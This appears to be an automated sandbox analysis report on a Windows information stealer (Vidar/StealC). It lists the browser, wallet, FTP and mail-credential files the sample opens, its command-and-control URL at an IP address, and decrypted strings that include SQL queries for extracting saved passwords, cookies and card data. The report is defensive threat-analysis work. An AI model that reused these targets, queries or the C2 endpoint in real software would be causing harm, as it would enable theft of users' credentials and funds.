Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: i3NmF0obCm.exe, type: SAMPLE
Source: Yara match	File source: 0.2.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: decrypted.binstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: i3NmF0obCm.exe, type: SAMPLE
Source: Yara match	File source: 0.2.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6C0C40 sqlite3_bind_zeroblob,	0_2_6C6C0C40
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6C0D60 sqlite3_bind_parameter_name,	0_2_6C6C0D60
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5E8EA0 sqlite3_clear_bindings,	0_2_6C5E8EA0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6C0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C6C0B40
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5E6410 bind,WSAGetLastError,	0_2_6C5E6410

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
40.86.87.10	unknown	United States		8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://40.86.87.10/b13597c85f807692/msvcp140.dll	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://40.86.87.10/b13597c85f807692/freebl3.dll	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://40.86.87.10/b13597c85f807692/vcruntime140.dll	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://40.86.87.10/b13597c85f807692/sqlite3.dll	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://40.86.87.10/108e010e8f91c38c.php	true	3%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://40.86.87.10/b13597c85f807692/mozglue.dll	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://40.86.87.10/b13597c85f807692/softokn3.dll	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://40.86.87.10/b13597c85f807692/nss3.dll	true	Avira URL Cloud: malware	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: i3NmF0obCm.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://40.86.87.10/108e010e8f91c38c.php%	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php(	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/softokn3.dllJtx	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php:	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php9	Avira URL Cloud: Label: malware
Source: http://40.86.87.10	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php2	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/mozglue.dllv	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/nss3.dllowser	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/freebl3.dll$	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php~	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/mozglue.dllL	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/freebl3.dll:	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.phposition:	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.phpe	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.phpirefox	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/nss3.dllll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/nss3.dllllU	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php976cbc684762e42ee25308426ba0ad93	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.phpv	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.phpI	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/nss3.dll	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/b13597c85f807692/nss3.dllQ	Avira URL Cloud: Label: malware
Source: http://40.86.87.10/108e010e8f91c38c.php-LTC	Avira URL Cloud: Label: malware

Found malware configuration

Source: i3NmF0obCm.exe	Malware Configuration Extractor: Vidar {"C2 url": "http://40.86.87.10/108e010e8f91c38c.php"}
Source: 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://40.86.87.10/108e010e8f91c38c.php"}

Multi AV Scanner detection for submitted file

Source: i3NmF0obCm.exe	Virustotal: Detection: 58%			Perma Link
Source: i3NmF0obCm.exe	ReversingLabs: Detection: 71%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: i3NmF0obCm.exe	String decryptor: INSERT_KEY_HERE
Source: i3NmF0obCm.exe	String decryptor: GetProcAddress
Source: i3NmF0obCm.exe	String decryptor: LoadLibraryA
Source: i3NmF0obCm.exe	String decryptor: lstrcatA
Source: i3NmF0obCm.exe	String decryptor: OpenEventA
Source: i3NmF0obCm.exe	String decryptor: CreateEventA
Source: i3NmF0obCm.exe	String decryptor: CloseHandle
Source: i3NmF0obCm.exe	String decryptor: Sleep
Source: i3NmF0obCm.exe	String decryptor: GetUserDefaultLangID
Source: i3NmF0obCm.exe	String decryptor: VirtualAllocExNuma
Source: i3NmF0obCm.exe	String decryptor: VirtualFree
Source: i3NmF0obCm.exe	String decryptor: GetSystemInfo
Source: i3NmF0obCm.exe	String decryptor: VirtualAlloc
Source: i3NmF0obCm.exe	String decryptor: HeapAlloc
Source: i3NmF0obCm.exe	String decryptor: GetComputerNameA
Source: i3NmF0obCm.exe	String decryptor: lstrcpyA
Source: i3NmF0obCm.exe	String decryptor: GetProcessHeap
Source: i3NmF0obCm.exe	String decryptor: GetCurrentProcess
Source: i3NmF0obCm.exe	String decryptor: lstrlenA
Source: i3NmF0obCm.exe	String decryptor: ExitProcess
Source: i3NmF0obCm.exe	String decryptor: GlobalMemoryStatusEx
Source: i3NmF0obCm.exe	String decryptor: GetSystemTime
Source: i3NmF0obCm.exe	String decryptor: SystemTimeToFileTime
Source: i3NmF0obCm.exe	String decryptor: advapi32.dll
Source: i3NmF0obCm.exe	String decryptor: gdi32.dll
Source: i3NmF0obCm.exe	String decryptor: user32.dll
Source: i3NmF0obCm.exe	String decryptor: crypt32.dll
Source: i3NmF0obCm.exe	String decryptor: ntdll.dll
Source: i3NmF0obCm.exe	String decryptor: GetUserNameA
Source: i3NmF0obCm.exe	String decryptor: CreateDCA
Source: i3NmF0obCm.exe	String decryptor: GetDeviceCaps
Source: i3NmF0obCm.exe	String decryptor: ReleaseDC
Source: i3NmF0obCm.exe	String decryptor: CryptStringToBinaryA
Source: i3NmF0obCm.exe	String decryptor: sscanf
Source: i3NmF0obCm.exe	String decryptor: VMwareVMware
Source: i3NmF0obCm.exe	String decryptor: HAL9TH
Source: i3NmF0obCm.exe	String decryptor: JohnDoe
Source: i3NmF0obCm.exe	String decryptor: DISPLAY
Source: i3NmF0obCm.exe	String decryptor: %hu/%hu/%hu
Source: i3NmF0obCm.exe	String decryptor: http://40.86.87.10
Source: i3NmF0obCm.exe	String decryptor: /108e010e8f91c38c.php
Source: i3NmF0obCm.exe	String decryptor: /b13597c85f807692/
Source: i3NmF0obCm.exe	String decryptor: GetEnvironmentVariableA
Source: i3NmF0obCm.exe	String decryptor: GetFileAttributesA
Source: i3NmF0obCm.exe	String decryptor: GlobalLock
Source: i3NmF0obCm.exe	String decryptor: HeapFree
Source: i3NmF0obCm.exe	String decryptor: GetFileSize
Source: i3NmF0obCm.exe	String decryptor: GlobalSize
Source: i3NmF0obCm.exe	String decryptor: CreateToolhelp32Snapshot
Source: i3NmF0obCm.exe	String decryptor: IsWow64Process
Source: i3NmF0obCm.exe	String decryptor: Process32Next
Source: i3NmF0obCm.exe	String decryptor: GetLocalTime
Source: i3NmF0obCm.exe	String decryptor: FreeLibrary
Source: i3NmF0obCm.exe	String decryptor: GetTimeZoneInformation
Source: i3NmF0obCm.exe	String decryptor: GetSystemPowerStatus
Source: i3NmF0obCm.exe	String decryptor: GetVolumeInformationA
Source: i3NmF0obCm.exe	String decryptor: GetWindowsDirectoryA
Source: i3NmF0obCm.exe	String decryptor: Process32First
Source: i3NmF0obCm.exe	String decryptor: GetLocaleInfoA
Source: i3NmF0obCm.exe	String decryptor: GetUserDefaultLocaleName
Source: i3NmF0obCm.exe	String decryptor: GetModuleFileNameA
Source: i3NmF0obCm.exe	String decryptor: DeleteFileA
Source: i3NmF0obCm.exe	String decryptor: FindNextFileA
Source: i3NmF0obCm.exe	String decryptor: LocalFree
Source: i3NmF0obCm.exe	String decryptor: FindClose
Source: i3NmF0obCm.exe	String decryptor: SetEnvironmentVariableA
Source: i3NmF0obCm.exe	String decryptor: LocalAlloc
Source: i3NmF0obCm.exe	String decryptor: GetFileSizeEx
Source: i3NmF0obCm.exe	String decryptor: ReadFile
Source: i3NmF0obCm.exe	String decryptor: SetFilePointer
Source: i3NmF0obCm.exe	String decryptor: WriteFile
Source: i3NmF0obCm.exe	String decryptor: CreateFileA
Source: i3NmF0obCm.exe	String decryptor: FindFirstFileA
Source: i3NmF0obCm.exe	String decryptor: CopyFileA
Source: i3NmF0obCm.exe	String decryptor: VirtualProtect
Source: i3NmF0obCm.exe	String decryptor: GetLogicalProcessorInformationEx
Source: i3NmF0obCm.exe	String decryptor: GetLastError
Source: i3NmF0obCm.exe	String decryptor: lstrcpynA
Source: i3NmF0obCm.exe	String decryptor: MultiByteToWideChar
Source: i3NmF0obCm.exe	String decryptor: GlobalFree
Source: i3NmF0obCm.exe	String decryptor: WideCharToMultiByte
Source: i3NmF0obCm.exe	String decryptor: GlobalAlloc
Source: i3NmF0obCm.exe	String decryptor: OpenProcess
Source: i3NmF0obCm.exe	String decryptor: TerminateProcess
Source: i3NmF0obCm.exe	String decryptor: GetCurrentProcessId
Source: i3NmF0obCm.exe	String decryptor: gdiplus.dll
Source: i3NmF0obCm.exe	String decryptor: ole32.dll
Source: i3NmF0obCm.exe	String decryptor: bcrypt.dll
Source: i3NmF0obCm.exe	String decryptor: wininet.dll
Source: i3NmF0obCm.exe	String decryptor: shlwapi.dll
Source: i3NmF0obCm.exe	String decryptor: shell32.dll
Source: i3NmF0obCm.exe	String decryptor: psapi.dll
Source: i3NmF0obCm.exe	String decryptor: rstrtmgr.dll
Source: i3NmF0obCm.exe	String decryptor: CreateCompatibleBitmap
Source: i3NmF0obCm.exe	String decryptor: SelectObject
Source: i3NmF0obCm.exe	String decryptor: BitBlt
Source: i3NmF0obCm.exe	String decryptor: DeleteObject
Source: i3NmF0obCm.exe	String decryptor: CreateCompatibleDC
Source: i3NmF0obCm.exe	String decryptor: GdipGetImageEncodersSize
Source: i3NmF0obCm.exe	String decryptor: GdipGetImageEncoders
Source: i3NmF0obCm.exe	String decryptor: GdipCreateBitmapFromHBITMAP
Source: i3NmF0obCm.exe	String decryptor: GdiplusStartup
Source: i3NmF0obCm.exe	String decryptor: GdiplusShutdown
Source: i3NmF0obCm.exe	String decryptor: GdipSaveImageToStream
Source: i3NmF0obCm.exe	String decryptor: GdipDisposeImage
Source: i3NmF0obCm.exe	String decryptor: GdipFree
Source: i3NmF0obCm.exe	String decryptor: GetHGlobalFromStream
Source: i3NmF0obCm.exe	String decryptor: CreateStreamOnHGlobal
Source: i3NmF0obCm.exe	String decryptor: CoUninitialize
Source: i3NmF0obCm.exe	String decryptor: CoInitialize
Source: i3NmF0obCm.exe	String decryptor: CoCreateInstance
Source: i3NmF0obCm.exe	String decryptor: BCryptGenerateSymmetricKey
Source: i3NmF0obCm.exe	String decryptor: BCryptCloseAlgorithmProvider
Source: i3NmF0obCm.exe	String decryptor: BCryptDecrypt
Source: i3NmF0obCm.exe	String decryptor: BCryptSetProperty
Source: i3NmF0obCm.exe	String decryptor: BCryptDestroyKey
Source: i3NmF0obCm.exe	String decryptor: BCryptOpenAlgorithmProvider
Source: i3NmF0obCm.exe	String decryptor: GetWindowRect
Source: i3NmF0obCm.exe	String decryptor: GetDesktopWindow
Source: i3NmF0obCm.exe	String decryptor: GetDC
Source: i3NmF0obCm.exe	String decryptor: CloseWindow
Source: i3NmF0obCm.exe	String decryptor: wsprintfA
Source: i3NmF0obCm.exe	String decryptor: EnumDisplayDevicesA
Source: i3NmF0obCm.exe	String decryptor: GetKeyboardLayoutList
Source: i3NmF0obCm.exe	String decryptor: CharToOemW
Source: i3NmF0obCm.exe	String decryptor: wsprintfW
Source: i3NmF0obCm.exe	String decryptor: RegQueryValueExA
Source: i3NmF0obCm.exe	String decryptor: RegEnumKeyExA
Source: i3NmF0obCm.exe	String decryptor: RegOpenKeyExA
Source: i3NmF0obCm.exe	String decryptor: RegCloseKey
Source: i3NmF0obCm.exe	String decryptor: RegEnumValueA
Source: i3NmF0obCm.exe	String decryptor: CryptBinaryToStringA
Source: i3NmF0obCm.exe	String decryptor: CryptUnprotectData
Source: i3NmF0obCm.exe	String decryptor: SHGetFolderPathA
Source: i3NmF0obCm.exe	String decryptor: ShellExecuteExA
Source: i3NmF0obCm.exe	String decryptor: InternetOpenUrlA
Source: i3NmF0obCm.exe	String decryptor: InternetConnectA
Source: i3NmF0obCm.exe	String decryptor: InternetCloseHandle
Source: i3NmF0obCm.exe	String decryptor: InternetOpenA
Source: i3NmF0obCm.exe	String decryptor: HttpSendRequestA
Source: i3NmF0obCm.exe	String decryptor: HttpOpenRequestA
Source: i3NmF0obCm.exe	String decryptor: InternetReadFile
Source: i3NmF0obCm.exe	String decryptor: InternetCrackUrlA
Source: i3NmF0obCm.exe	String decryptor: StrCmpCA
Source: i3NmF0obCm.exe	String decryptor: StrStrA
Source: i3NmF0obCm.exe	String decryptor: StrCmpCW
Source: i3NmF0obCm.exe	String decryptor: PathMatchSpecA
Source: i3NmF0obCm.exe	String decryptor: GetModuleFileNameExA
Source: i3NmF0obCm.exe	String decryptor: RmStartSession
Source: i3NmF0obCm.exe	String decryptor: RmRegisterResources
Source: i3NmF0obCm.exe	String decryptor: RmGetList
Source: i3NmF0obCm.exe	String decryptor: RmEndSession
Source: i3NmF0obCm.exe	String decryptor: sqlite3_open
Source: i3NmF0obCm.exe	String decryptor: sqlite3_prepare_v2
Source: i3NmF0obCm.exe	String decryptor: sqlite3_step
Source: i3NmF0obCm.exe	String decryptor: sqlite3_column_text
Source: i3NmF0obCm.exe	String decryptor: sqlite3_finalize
Source: i3NmF0obCm.exe	String decryptor: sqlite3_close
Source: i3NmF0obCm.exe	String decryptor: sqlite3_column_bytes
Source: i3NmF0obCm.exe	String decryptor: sqlite3_column_blob
Source: i3NmF0obCm.exe	String decryptor: encrypted_key
Source: i3NmF0obCm.exe	String decryptor: PATH
Source: i3NmF0obCm.exe	String decryptor: C:\ProgramData\nss3.dll
Source: i3NmF0obCm.exe	String decryptor: NSS_Init
Source: i3NmF0obCm.exe	String decryptor: NSS_Shutdown
Source: i3NmF0obCm.exe	String decryptor: PK11_GetInternalKeySlot
Source: i3NmF0obCm.exe	String decryptor: PK11_FreeSlot
Source: i3NmF0obCm.exe	String decryptor: PK11_Authenticate
Source: i3NmF0obCm.exe	String decryptor: PK11SDR_Decrypt
Source: i3NmF0obCm.exe	String decryptor: C:\ProgramData\
Source: i3NmF0obCm.exe	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: i3NmF0obCm.exe	String decryptor: browser:
Source: i3NmF0obCm.exe	String decryptor: profile:
Source: i3NmF0obCm.exe	String decryptor: url:
Source: i3NmF0obCm.exe	String decryptor: login:
Source: i3NmF0obCm.exe	String decryptor: password:
Source: i3NmF0obCm.exe	String decryptor: Opera
Source: i3NmF0obCm.exe	String decryptor: OperaGX
Source: i3NmF0obCm.exe	String decryptor: Network
Source: i3NmF0obCm.exe	String decryptor: cookies
Source: i3NmF0obCm.exe	String decryptor: .txt
Source: i3NmF0obCm.exe	String decryptor: TRUE
Source: i3NmF0obCm.exe	String decryptor: FALSE
Source: i3NmF0obCm.exe	String decryptor: autofill
Source: i3NmF0obCm.exe	String decryptor: SELECT name, value FROM autofill
Source: i3NmF0obCm.exe	String decryptor: history
Source: i3NmF0obCm.exe	String decryptor: SELECT url FROM urls LIMIT 1000
Source: i3NmF0obCm.exe	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: i3NmF0obCm.exe	String decryptor: name:
Source: i3NmF0obCm.exe	String decryptor: month:
Source: i3NmF0obCm.exe	String decryptor: year:
Source: i3NmF0obCm.exe	String decryptor: card:
Source: i3NmF0obCm.exe	String decryptor: Cookies
Source: i3NmF0obCm.exe	String decryptor: Login Data
Source: i3NmF0obCm.exe	String decryptor: Web Data
Source: i3NmF0obCm.exe	String decryptor: History
Source: i3NmF0obCm.exe	String decryptor: logins.json
Source: i3NmF0obCm.exe	String decryptor: formSubmitURL
Source: i3NmF0obCm.exe	String decryptor: usernameField
Source: i3NmF0obCm.exe	String decryptor: encryptedUsername
Source: i3NmF0obCm.exe	String decryptor: encryptedPassword
Source: i3NmF0obCm.exe	String decryptor: guid
Source: i3NmF0obCm.exe	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: i3NmF0obCm.exe	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: i3NmF0obCm.exe	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: i3NmF0obCm.exe	String decryptor: cookies.sqlite
Source: i3NmF0obCm.exe	String decryptor: formhistory.sqlite
Source: i3NmF0obCm.exe	String decryptor: places.sqlite
Source: i3NmF0obCm.exe	String decryptor: plugins
Source: i3NmF0obCm.exe	String decryptor: Local Extension Settings
Source: i3NmF0obCm.exe	String decryptor: Sync Extension Settings
Source: i3NmF0obCm.exe	String decryptor: IndexedDB
Source: i3NmF0obCm.exe	String decryptor: Opera Stable
Source: i3NmF0obCm.exe	String decryptor: Opera GX Stable
Source: i3NmF0obCm.exe	String decryptor: CURRENT
Source: i3NmF0obCm.exe	String decryptor: chrome-extension_
Source: i3NmF0obCm.exe	String decryptor: _0.indexeddb.leveldb
Source: i3NmF0obCm.exe	String decryptor: Local State
Source: i3NmF0obCm.exe	String decryptor: profiles.ini
Source: i3NmF0obCm.exe	String decryptor: chrome
Source: i3NmF0obCm.exe	String decryptor: opera
Source: i3NmF0obCm.exe	String decryptor: firefox
Source: i3NmF0obCm.exe	String decryptor: wallets
Source: i3NmF0obCm.exe	String decryptor: %08lX%04lX%lu
Source: i3NmF0obCm.exe	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: i3NmF0obCm.exe	String decryptor: ProductName
Source: i3NmF0obCm.exe	String decryptor: %d/%d/%d %d:%d:%d
Source: i3NmF0obCm.exe	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: i3NmF0obCm.exe	String decryptor: ProcessorNameString
Source: i3NmF0obCm.exe	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: i3NmF0obCm.exe	String decryptor: DisplayName
Source: i3NmF0obCm.exe	String decryptor: DisplayVersion
Source: i3NmF0obCm.exe	String decryptor: Network Info:
Source: i3NmF0obCm.exe	String decryptor: - IP: IP?
Source: i3NmF0obCm.exe	String decryptor: - Country: ISO?
Source: i3NmF0obCm.exe	String decryptor: System Summary:
Source: i3NmF0obCm.exe	String decryptor: - HWID:
Source: i3NmF0obCm.exe	String decryptor: - OS:
Source: i3NmF0obCm.exe	String decryptor: - Architecture:
Source: i3NmF0obCm.exe	String decryptor: - UserName:
Source: i3NmF0obCm.exe	String decryptor: - Computer Name:
Source: i3NmF0obCm.exe	String decryptor: - Local Time:
Source: i3NmF0obCm.exe	String decryptor: - UTC:
Source: i3NmF0obCm.exe	String decryptor: - Language:
Source: i3NmF0obCm.exe	String decryptor: - Keyboards:
Source: i3NmF0obCm.exe	String decryptor: - Laptop:
Source: i3NmF0obCm.exe	String decryptor: - Running Path:
Source: i3NmF0obCm.exe	String decryptor: - CPU:
Source: i3NmF0obCm.exe	String decryptor: - Threads:
Source: i3NmF0obCm.exe	String decryptor: - Cores:
Source: i3NmF0obCm.exe	String decryptor: - RAM:
Source: i3NmF0obCm.exe	String decryptor: - Display Resolution:
Source: i3NmF0obCm.exe	String decryptor: - GPU:
Source: i3NmF0obCm.exe	String decryptor: User Agents:
